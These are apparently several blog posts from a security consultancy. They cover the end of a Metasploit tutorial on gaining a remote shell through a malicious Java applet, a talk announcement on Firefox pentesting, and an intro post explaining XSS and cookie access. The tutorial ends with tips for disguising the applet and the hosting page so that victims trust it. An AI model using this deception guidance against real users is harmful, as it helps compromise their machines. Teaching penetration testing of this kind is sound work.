BINGO! We have a Windows command prompt on our remote machine! :o)

Now we can issue Windows commands on the victim machine. Alternatively, instead of connecting to a shell, Meterpreter supports a number of scripts that provides a host of other functionality.

Other Attack Options

Option #1

Modify the Java applet certificate settings to more realistic/authentic values. We used the defaults in this demo but you can change the following. In MSF3, use the “info” command once you’ve set the exploit:

Changing these settings to something the victim would more likely accept as legitimate. "...ooh, a company news ticker...."

Upon connection to your attacker machine, they'd see this instead:

Option #2

Use SSL if possible, users often assume an HTTPS connection is totally secure...even its content is ‘safe’....whatever....MSF3 payloads will soon change that :o)

Option #3

Use a properly constructed web page. This demo used a simple blank page with "Loading, Please Wait" at the top. A company intranet page or something similar looking hosted by an attack machine would disguise your nefarious activities and avoid suspicion.

Thanks To......

Dark Operator for all his contributions towards Metasploit and crucially the Meterpreter tutorials for which I am forever reading, testing and using!

The rest of the crew at PaulDotCom for making all this great information available to the masses (and also having a great show!) :o)

And finally to Nathan Keltner and all those involved in The Metasploit Project and for making a great exploitation framework.

Using Firefox as a penetration test tool

Today I'm going to do a speak at "Reading Geek Night 4" about how to use Firefox as a pentesting tool.

It's going to be a short talk with some demos and I'll show different more or less common Firefox extensions and how use them to bypass or test the security in web pages. You can read more about it at the official web page.

See you there!

UPDATE: I just post in my personal blog some information about the talk and the extensions I used.

Hello World!

Hello, my name is Pedro Laguna and I'm security consultant at Pentura Ltd. I'm going to write the first post in this new blog about our security consultancy work in Pentura. This is going to be a place to write down all these small tricks that we use to break the security in some scenarios, post about our tools and scripts or a place to contribute with a better understood about all the security terms.

The most common way to start a blog (more specifically a computer related blog) is posting a "Hello World" post. This is some kind of joke about the first program that anyone learn to do in any coding language. You can check a list with more than 200 examples of Hello World programs in the Wikibooks page.

In our case, as we are a security-related blog, we have to do it in a security way. More specific using Javascript to generate an alert to show the message "Hello World!".

Click here to generate "Hello World!" the alert

Now is time for a bit of technical explanation... If someone can insert Javascript in our pages like we already do, is a vulnerability because he or she can get our cookie session, per example. So, is blogspot in risk? No, and we are going to explain why.

For access to the cookie information using Javascript we need to call to the document.cookie object. This object only has privileges to access to the current domain cookies (it's a browser security measure). Blogger platform only stores cookies in the blogger.com domain and we can only access to blogspot.com domain cookies. You can check it clicking in the following link:

Click here to show blogspot.com cookies

As you can see no session cookie was showed, so... we are safe!!! But only for now, cookie sessions, XSS vulnerabilities and all these web security stuff has a lot to explain and we will be showing you here :)